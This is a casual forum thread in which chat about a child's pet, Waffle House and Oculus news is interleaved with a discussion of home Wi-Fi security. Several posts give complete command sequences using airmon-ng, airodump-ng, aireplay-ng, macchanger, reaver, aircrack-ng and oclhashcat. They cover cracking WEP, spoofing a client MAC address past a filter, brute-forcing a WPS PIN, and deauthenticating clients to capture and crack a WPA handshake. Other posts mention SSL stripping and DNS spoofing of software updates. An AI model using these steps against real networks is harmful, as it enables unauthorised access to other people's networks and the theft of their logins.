Jump to content
Mark LaFountain

Welcome to the IHoP v.2

Recommended Posts

Harry had his first successful feeding tonight.  We searched for an hour for a cricket, finally snagged one, dropped him in and 5 minutes later, he was a goner.  Gavin was going nuts, but I didn't get to see it.

 

Gavin is liking his new pet it sounds like.

yoda1.gif

Share this post


Link to post
Share on other sites

laugh.png

Share this post


Link to post
Share on other sites

Breaking wep takes under 10min.

If router uses wps, 24 hours max.

If using wpa, deauth clients, and record handshake upon reconnection. Might take 5 minutes, might take a few days until a wireless device is used. Either way they get the hash. Only safe guard is a strong password. Ub3R+c0d31 is not strong.

Once they're on the network they can grab just about every login. Hit up the bank site, and the connection is no longer ssl https because its been stripped down to a standard http connection.

OS patched up to date, no vulnerabilities, safe right? When iTunes, windows mail, filezilla, Microsoft update, etc all start up they connect to a server to check for updates, and the dns request can be spoofed so they connect to the wrong server, and download a fake update.

That's definitely a lot of work to single someone random out for all that, and I doubt it'll happen, but its possible, and as Matt said, not very difficult.

 

While it's possible to crack all of these types of encryption, using a mac filter will take care of any of this for the most part. It's pretty difficult to realistically crack a wireless network unless you really know what you are doing. If you have  MAC filter in place on your router though, it's WAY harder to get connected. The router will simply block a computer based on it's hardware id, so unless someone physically breaks in and finds out what your hardware ids are, they aren't getting connected. If someone were willing to do that you must have some important shit on lock haha.

 

There are ways to get in obviously or these multibillion dollar corporations wouldn't get hacked, but that is a lot of effort just to access someone's personal accounts.

Edited by ulrisa

Share this post


Link to post
Share on other sites

Harry had his first successful feeding tonight.  We searched for an hour for a cricket, finally snagged one, dropped him in and 5 minutes later, he was a goner.  Gavin was going nuts, but I didn't get to see it.

 

Gavin is liking his new pet it sounds like.

He absolutely loves the thing.

Share this post


Link to post
Share on other sites

Harry had his first successful feeding tonight. We searched for an hour for a cricket, finally snagged one, dropped him in and 5 minutes later, he was a goner. Gavin was going nuts, but I didn't get to see it.

Gavin is liking his new pet it sounds like.

He absolutely loves the thing.
Cool dad points go to you for sure.

Pics of it killing the cricket next time.

Share this post


Link to post
Share on other sites

Breaking wep takes under 10min.

If router uses wps, 24 hours max.

If using wpa, deauth clients, and record handshake upon reconnection. Might take 5 minutes, might take a few days until a wireless device is used. Either way they get the hash. Only safe guard is a strong password. Ub3R+c0d31 is not strong.

Once they're on the network they can grab just about every login. Hit up the bank site, and the connection is no longer ssl https because its been stripped down to a standard http connection.

OS patched up to date, no vulnerabilities, safe right? When iTunes, windows mail, filezilla, Microsoft update, etc all start up they connect to a server to check for updates, and the dns request can be spoofed so they connect to the wrong server, and download a fake update.

That's definitely a lot of work to single someone random out for all that, and I doubt it'll happen, but its possible, and as Matt said, not very difficult.

While it's possible to crack all of these types of encryption, using a mac filter will take care of any of this for the most part. It's pretty difficult to realistically crack a wireless network unless you really know what you are doing. If you have MAC filter in place on your router though, it's WAY harder to get connected. The router will simply block a computer based on it's hardware id, so unless someone physically breaks in and finds out what your hardware ids are, they aren't getting connected. If someone were willing to do that you must have some important shit on lock haha.

There are ways to get in obviously or these multibillion dollar corporations wouldn't get hacked, but that is a lot of effort just to access someone's personal accounts.

While you should use a MAC address filter it doesn't slow someone down if they are looking to get onto your network. When they scan for a wireless signal they can see the I'D of a device that is sending and receiving packets.

They then dupe that I'D and Bob's your uncle they are in. Encryption with a long complex password is still the best security. It takes computer time and brute force to figure out. MAC address I'D can help but if they have the know how to find your network with a scanning tool, they have the program to find out what devices are sending and receiving packets. It's then copy and past the I'D and they spoof away.

Encryption encryption encryption.

Hyper tallented groups can work around encryption but usually they need to know specifics about the system/network to exploit weaknesses. Massive smurfing attacks and such can cripple systems and then they can exploit weaknesses, or even easier do some quality phishing and get in at the lowest level and work their way to sensitive material from there.

None of that

Share this post


Link to post
Share on other sites

Matters much for the home user unless for some reason you are the target of a hacker group.

Share this post


Link to post
Share on other sites

Breaking wep takes under 10min.

If router uses wps, 24 hours max.

If using wpa, deauth clients, and record handshake upon reconnection. Might take 5 minutes, might take a few days until a wireless device is used. Either way they get the hash. Only safe guard is a strong password. Ub3R+c0d31 is not strong.

Once they're on the network they can grab just about every login. Hit up the bank site, and the connection is no longer ssl https because its been stripped down to a standard http connection.

OS patched up to date, no vulnerabilities, safe right? When iTunes, windows mail, filezilla, Microsoft update, etc all start up they connect to a server to check for updates, and the dns request can be spoofed so they connect to the wrong server, and download a fake update.

That's definitely a lot of work to single someone random out for all that, and I doubt it'll happen, but its possible, and as Matt said, not very difficult.

 

While it's possible to crack all of these types of encryption, using a mac filter will take care of any of this for the most part. It's pretty difficult to realistically crack a wireless network unless you really know what you are doing. If you have  MAC filter in place on your router though, it's WAY harder to get connected. The router will simply block a computer based on it's hardware id, so unless someone physically breaks in and finds out what your hardware ids are, they aren't getting connected. If someone were willing to do that you must have some important shit on lock haha.

 

There are ways to get in obviously or these multibillion dollar corporations wouldn't get hacked, but that is a lot of effort just to access someone's personal accounts.

 

That actually isn't very helpful. Run airodump-ng in monitor mode for five minutes on the access point, and see which clients are connecting (check their MAC address). Then change your mac address with macchanger (unix), or under network device settings in windows to reflect one of the client's mac address, and now the router will accept your connection.

 

And realistically no it's not difficult to crack a wireless network.

 

WEP

------

airmon-ng check kill //kill any proccesses using wireless cards

airmon-ng //lists wireless cards / devices

airmon-ng start wlan0 //start wlan0 interface, and create monitor mode on mon0

airodump-ng mon0 //or use kismet, select access point and clients. note mac address for one of the clients.

crtl-c //kill airodump-ng process

ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0 //set to client mac address

ifconfig mon0 up

 

airodump-ng -c 2 -w logfile --bssid bssidofap mon //start capturing packets on access point "bssidofap" on channel 2, and record to logfile

crtl+shift+t //new terminal

aireplay-ng -1 0 -a bssid mon0 //fake authent with ap

crtl+shift+t

aireplay-ng -3 -b bssid mon0 //create arp packets, creates traffic

wait until 10-50k packets, then kill aireplay and airodump.

aircrack-ng logfile-01.cap

five minutes later WEP key is known.

Edited by stefanhinote

Share this post


Link to post
Share on other sites

If router is using WPS then you can do the above to grab the bssid "mac address" of the router, then simply run reaver:

reaver -i mon0 -v -A -c 1 -b 00:11:22:33:44:55

 

This may take over a day or so, but it will work, only takes around 11k guesses until it finds the pin.

Share this post


Link to post
Share on other sites

If their using WPA,

 

Use same steps as WEP to find bssid of AP, channel, clients connecting, and spoof mac address if needed, then:

 

airodump-ng mon0 -c channel -t wpa -d bssid -w log

crtl+shift+t

aireplay-ng -0 50 -a bssid -c clientmac mon //this one may have to be ran several times, and number 50 adjusted along the way since it's deauthing connected devices, and airodump is attempting to record the handshake. If you continually deauth them then they can't connect, but sending a few deauths may not be seen.

 

watch first terminal until airodump shows a wpa handshake captured, then kill both processes.

 

aircrack-ng log-01.cap -J crackme

 

If your computer sucks you can use aircrack with some wordlists against log-01.cap, or throw the crackme file against oclhashcat-plus (GPU based). Two AMD HD 6990 results in 350,000 keys tested per second. Brute forcing the min 8 characters doesn't very long. Then throw in wordlists and rules, and the only thing between them and the router is a strong password. :)

Share this post


Link to post
Share on other sites

Matt you remember those Oculus Rift headsets I posted on here a while back? The co-founder died yesterday after being hit by a car in a police chase.

Share this post


Link to post
Share on other sites

Just use a hard line connection...  

Share this post


Link to post
Share on other sites

k-bigpic.png

Are you in ihop land?

Share this post


Link to post
Share on other sites

Ihop land here but we also have a Waffle House.

Share this post


Link to post
Share on other sites

We have about 3 waffle houses in Tucson too.

J

Share this post


Link to post
Share on other sites

Matt you remember those Oculus Rift headsets I posted on here a while back? The co-founder died yesterday after being hit by a car in a police chase.

Jesus.

I didn't know. I have been following that product a lot.

Share this post


Link to post
Share on other sites

Harry had his first successful feeding tonight. We searched for an hour for a cricket, finally snagged one, dropped him in and 5 minutes later, he was a goner. Gavin was going nuts, but I didn't get to see it.

Gavin is liking his new pet it sounds like.
He absolutely loves the thing.
Cool dad points go to you for sure.

Pics of it killing the cricket next time.

Cool points for sure!

Share this post


Link to post
Share on other sites

k-bigpic.png

Are you in ihop land?

Nothing here in Pa.

Share this post


Link to post
Share on other sites

Breaking wep takes under 10min.

If router uses wps, 24 hours max.

If using wpa, deauth clients, and record handshake upon reconnection. Might take 5 minutes, might take a few days until a wireless device is used. Either way they get the hash. Only safe guard is a strong password. Ub3R+c0d31 is not strong.

Once they're on the network they can grab just about every login. Hit up the bank site, and the connection is no longer ssl https because its been stripped down to a standard http connection.

OS patched up to date, no vulnerabilities, safe right? When iTunes, windows mail, filezilla, Microsoft update, etc all start up they connect to a server to check for updates, and the dns request can be spoofed so they connect to the wrong server, and download a fake update.

That's definitely a lot of work to single someone random out for all that, and I doubt it'll happen, but its possible, and as Matt said, not very difficult.

 

While it's possible to crack all of these types of encryption, using a mac filter will take care of any of this for the most part. It's pretty difficult to realistically crack a wireless network unless you really know what you are doing. If you have  MAC filter in place on your router though, it's WAY harder to get connected. The router will simply block a computer based on it's hardware id, so unless someone physically breaks in and finds out what your hardware ids are, they aren't getting connected. If someone were willing to do that you must have some important shit on lock haha.

 

There are ways to get in obviously or these multibillion dollar corporations wouldn't get hacked, but that is a lot of effort just to access someone's personal accounts.

 

Not hard to break a mac filter, or to use a key logger at all. Someone told me this... yeah...

 

. Only safe guard is a strong password. Ub3R+c0d31 is not strong.

.

one two three four five....

That is what I use at work.

 

That's the kind of combination an idiot has on their luggage...  mel-brooks-spaceballs-4-via-startyournov

 

k-bigpic.png

Are you in ihop land?

 

What has 6 tits and 4 teeth

'

Night crew at the waffle house.

Share this post


Link to post
Share on other sites

Mmmmmmmm...............resin fumes.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×